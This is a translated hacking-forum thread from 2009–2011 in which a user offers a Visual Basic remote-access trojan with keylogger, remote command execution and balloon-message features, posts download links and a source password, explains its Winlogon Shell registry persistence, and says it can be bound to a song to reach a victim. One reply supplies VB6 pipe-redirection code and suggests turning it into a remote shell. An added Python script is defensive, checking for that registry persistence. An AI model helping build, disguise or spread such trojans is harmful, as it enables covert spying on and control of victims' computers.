freshmeat (thread author), posted January 6, 2009

FreshMeat's Trojan
- Basic Filemanager
- Process List
- Keylogger
- SendKeys
- Registry Writer
- Ghost Execute
- Chat
- Batch Script
- Remote CMD (something along those lines)
- System Info (uptime, processor usage, win dir, user name, computer name)
- Balloon Message

Screen:
Virus Total result:
Download: Rapid Share
zippy, posted January 6, 2009

Can you explain to me a little what the Balloon Message option is?
Nytro, posted January 6, 2009

Cute, congratulations. But there are a few things I don't like. The first of them would be the name. I think a nicer name could have been found, not the author's name. For send keys, are you using the SendKeys function? Does remote cmd display the output? And for the disk drives you could have put them in a combo after receiving them from the server. Otherwise I like it. And if you can, add file transfer, since it's not hard: you send it in pieces, you read in blocks which you then send.
freshmeat (thread author), posted January 6, 2009 (edited)

> Cute, congratulations. But there are a few things I don't like. The first of them would be the name. I think a nicer name could have been found, not the author's name. For send keys, are you using the SendKeys function? Does remote cmd display the output? And for the disk drives you could have put them in a combo after receiving them from the server. Otherwise I like it. And if you can, add file transfer, since it's not hard: you send it in pieces, you read in blocks which you then send.

Thanks nytro! Regarding the trojan's name, honestly I didn't know what to put... do you have any ideas? With winsock I'm pretty rusty, I still have things to learn. You know, the filemanager isn't really that well done, but I know it could have been better. I got the idea with the combo, I know how to do it, but I didn't want to complicate things any further, and besides, how many drives could one have... yes, I know, a bit more of a hassle. I also posted the Source, and if someone wants to implement a file transfer too I have nothing against it... I still have to learn the filetransfer business too... the remote cmd is no big deal, it does this:
client: sends the string
server: executes the string
something like: shell ("cmd.exe /c" received string)
Something simple; for example, if you type dir it doesn't show you anything. I didn't want to complicate things, I know it can be done... maybe in version 2 I'll make the cmd more useful + a skin. Yes, I use sendkeys... now please test it too... whether the key combinations alt + f4, shift + f2 or whatever work properly... you have them there..
With the keylogger I have a small problem that has been driving me crazy lately: it keeps sending me [enter] [enter] [enter] [enter] endlessly, so I removed the enter :) For the keylogger I use GetAsyncKeyState... but I know there's also a better method, from what I've heard... something with directx... dunno, I haven't tried... correct me if I'm wrong.. Anyway there will be a version 2 that's much better...
For a beginner at winsock I'd say I did well...
@zippy: Balloon message: sends the victim a message in the form of a balloon (similar to the one for "NOD32 virus signature update" or Windows Updates etc...)
Here you also have the source: somewhat tangled, but I think people will understand it.
Download Visual Basic 6.0 Source
Password: rstcenter
If you want to and have ideas... modify the source and post the modification here... I won't be upset if you put the title "by ion" or whatever, it doesn't bother me, but I want all modifications to be posted here on the forum, not elsewhere. Thank you!

Edited January 6, 2009 by freshmeat
andy95, posted January 6, 2009

I have a question too... if I bind the server to a song, let's say... does it work? I mean, does it open so I can attack the victim?
Nytro, posted January 6, 2009

I asked about SendKeys because it seems to me that it doesn't work on Vista, and you have to use the SendInput API, with which I had a small problem... I want to do File Manager and Send File in my tutorial; if I have a little time I think I'll do it. But I've been saying that about a lot of things lately. I keep saying I'll do them and I haven't done anything. If you have questions, if I can help you, send me a PM.
freshmeat (thread author), posted January 7, 2009

> I have a question too... if I bind the server to a song, let's say... does it work? I mean, does it open so I can attack the victim?

It's already disguised, as you noticed; yes, I think you can bind it... or if you downloaded the trojan's source, then here is the infiltration method too: Download
xTwIsTx, posted February 28, 2009

the limit is reached.! +mirror
Acidripp, posted February 28, 2009

Error
This file is neither allocated to a Premium Account, or a Collector's Account, and can therefore only be downloaded 10 times.
This limit is reached.
To download this file, the uploader either needs to transfer this file into his/her Collector's Account, or upload the file again. The file can later be moved to a Collector's Account. The uploader just needs to click the delete link of the file to get further information.

Put it on ftp (http://rstcenter.com/forum/showthread.php?p=87371#post87371)
freshmeat (thread author), posted May 20, 2011

Download: Mirror1, Mirror2
ONes, posted May 22, 2011

Interesting, thx
Alexander33, posted May 22, 2011

I have a question too... where does it install itself and which registry key does it modify, if you can tell me... because I don't have vb06 anymore and don't really have time to install it....
freshmeat (thread author), posted May 23, 2011

It installs in windows.
Registry:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell]
Value = 'Explorer.exe c:\windows\svchost.exe'
Something like that...
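Added example, not code from the thread or from the trojan's source: a defender-side check for the persistence mechanism freshmeat describes above. It parses a Windows .reg export (the sample exports below are constructed, not taken from any real machine), pulls the Shell value under the Winlogon key and flags every entry that is not the stock explorer.exe, adding a note when the extra entry borrows a System32 binary name but lives elsewhere, as the c:\windows\svchost.exe path in the post does. The .reg parsing, the SYSTEM32_ONLY list and the acceptance of both comma and space as separators are my assumptions and go a little beyond the single value quoted in the post.

```python
import re

# The stock Windows shell that the Winlogon "Shell" value normally names.
STOCK_SHELL = "explorer.exe"
WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Binaries that only exist in System32 on a healthy install (assumed list); a file
# carrying one of these names anywhere else is a name-squatting copy.
SYSTEM32_ONLY = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}


def split_shell_value(value):
    """Split a Shell value into program entries.

    The documented separator is a comma, but the post shows a second program
    appended after a space, so both are treated as separators. Double-quoted
    paths (which may contain spaces) are kept whole.
    """
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|[^\s,]+', value)]


def audit_winlogon_shell(value):
    """Return one finding per entry that is not the stock shell; [] means clean."""
    entries = split_shell_value(value)
    if not entries:
        return ["Shell value is empty: Winlogon would start no shell at all"]
    findings = []
    for entry in entries:
        head, _, name = entry.replace("/", "\\").rpartition("\\")
        head, name = head.lower(), name.lower()
        # explorer.exe is legitimate bare or fully qualified under the Windows directory
        if name == STOCK_SHELL and head in ("", r"c:\windows", r"%systemroot%"):
            continue
        reason = "not the stock shell"
        if name in SYSTEM32_ONLY and not head.endswith("system32"):
            reason += f"; {name} is a System32 binary name but sits in '{head or '.'}'"
        findings.append(f"{entry}: {reason}")
    return findings


def unescape_reg_string(s):
    """Undo .reg escaping, where a backslash escapes the following character."""
    return re.sub(r"\\(.)", r"\1", s)


def scan_reg_export(text):
    """Find the Winlogon Shell value in a .reg export and audit it.

    Returns (shell_value, findings); shell_value is None when the value is
    absent, in which case Windows falls back to explorer.exe.
    """
    current_key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]
            continue
        if current_key and current_key.lower() == WINLOGON_KEY.lower():
            m = re.match(r'"Shell"="(.*)"$', line)
            if m:
                value = unescape_reg_string(m.group(1))
                return value, audit_winlogon_shell(value)
    return None, []


# Constructed sample exports (not real system data). The first carries the
# value quoted in the post; the second is a default install.
INFECTED_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\system32\\userinit.exe,"
"Shell"="Explorer.exe c:\\windows\\svchost.exe"
'''

CLEAN_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"
'''

if __name__ == "__main__":
    for label, export in (("infected", INFECTED_EXPORT), ("clean", CLEAN_EXPORT)):
        value, findings = scan_reg_export(export)
        print(f"{label}: Shell = {value!r}")
        for finding in findings:
            print("  FINDING:", finding)
```

On a live host the same audit applies to the output of `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" winlogon.reg`; the check is deliberately strict, so a legitimately customised shell on a kiosk build will show up as a finding and needs to be allow-listed rather than ignored.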
me.mello, posted May 23, 2011

I haven't looked over the code, for the simple reason: "Remote CMD (something along those lines)", and nothing in the functions you listed proves to me that this trojan doesn't resemble, or worse, isn't a faithful copy of some functions... from the hundreds of codes around the internet. Anyway, you did good work. But let's get back to CMD: I'll give you an example, not written by me, which uses one of the functions I use most (CreatePipe), and my favourite alongside CopyMemory. Basically it redirects CMD output, without using shellex or whatever function you wrote there with parameters and all. If you're inventive you can redirect to the client and vice versa; if you also have experience you can modify it and spawn a shell to the client... it all depends on how much VB you know. In the example below you can send the command directly from the client to the server and have the output sent to the client (you just have to modify it a little and implement winsock yourself however you know).
I hope it helps you in the future.

Option Explicit

' Win32 declarations: an anonymous pipe receives the child's stdout/stderr,
' which the parent reads back and appends to a text box.
Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long
Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO)
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

' Declared for completeness; the synchronous ReadFile below passes a null pointer instead.
Private Type OVERLAPPED
    Internal As Long
    InternalHigh As Long
    offset As Long
    OffsetHigh As Long
    hEvent As Long
End Type

Private Const STARTF_USESHOWWINDOW = &H1
Private Const STARTF_USESTDHANDLES = &H100
Private Const SW_HIDE = 0
Private Const EM_SETSEL = &HB1
Private Const EM_REPLACESEL = &HC2

Private Sub Command1_Click()
    Command1.Enabled = False
    Redirect Text1.Text, Text2
    Command1.Enabled = True
End Sub

Private Sub Form_Load()
    Text1.Text = "ping"
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
    ' Refuse to close while a redirected command is still running
    If Command1.Enabled = False Then Cancel = True
End Sub

Sub Redirect(cmdLine As String, objTarget As Object)
    Dim pa As SECURITY_ATTRIBUTES
    Dim pra As SECURITY_ATTRIBUTES
    Dim tra As SECURITY_ATTRIBUTES
    Dim pi As PROCESS_INFORMATION
    Dim sui As STARTUPINFO
    Dim hRead As Long
    Dim hWrite As Long
    Dim bRead As Long
    Dim lpBuffer(1024) As Byte

    ' The pipe handles must be inheritable so the child can write into them
    pa.nLength = Len(pa)
    pa.lpSecurityDescriptor = 0
    pa.bInheritHandle = True
    pra.nLength = Len(pra)
    tra.nLength = Len(tra)

    If CreatePipe(hRead, hWrite, pa, 0) <> 0 Then
        sui.cb = Len(sui)
        GetStartupInfo sui
        ' Point the child's stdout and stderr at the pipe's write end and hide its window
        sui.hStdOutput = hWrite
        sui.hStdError = hWrite
        sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES
        sui.wShowWindow = SW_HIDE
        ' lpEnvironment is a NULL pointer (ByVal 0&), so the child inherits our environment
        If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, ByVal 0&, vbNullString, sui, pi) <> 0 Then
            ' Close our copy of the write end right away: once the child exits, no
            ' writer is left and ReadFile fails, which is what ends the loop below.
            CloseHandle hWrite
            SetWindowText objTarget.hwnd, ""
            Do
                Erase lpBuffer()   ' zero the buffer so the chunk ends in a terminator
                If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) <> 0 Then
                    ' Drop any selection and insert the chunk at the caret, which sits
                    ' after the previously inserted text, so the output is appended
                    SendMessage objTarget.hwnd, EM_SETSEL, -1, 0
                    SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0)
                    DoEvents
                Else
                    CloseHandle pi.hThread
                    CloseHandle pi.hProcess
                    Exit Do
                End If
            Loop
        Else
            CloseHandle hWrite
        End If
        CloseHandle hRead
    End If
End Sub

As I said, the example above isn't written by me, although the idea is old and was used by me before this example. I hope it helps you (going further from here wouldn't even be hard)... I say this because, with a trojan, what seems most interesting to me is access to a lowly CMD, whether it's redirected or spawned, whether with system privilege or not.
Of course, you can always hook into a process and do this flawlessly... but it's very hard in VB, especially for you... at this stage. With that said, congratulations.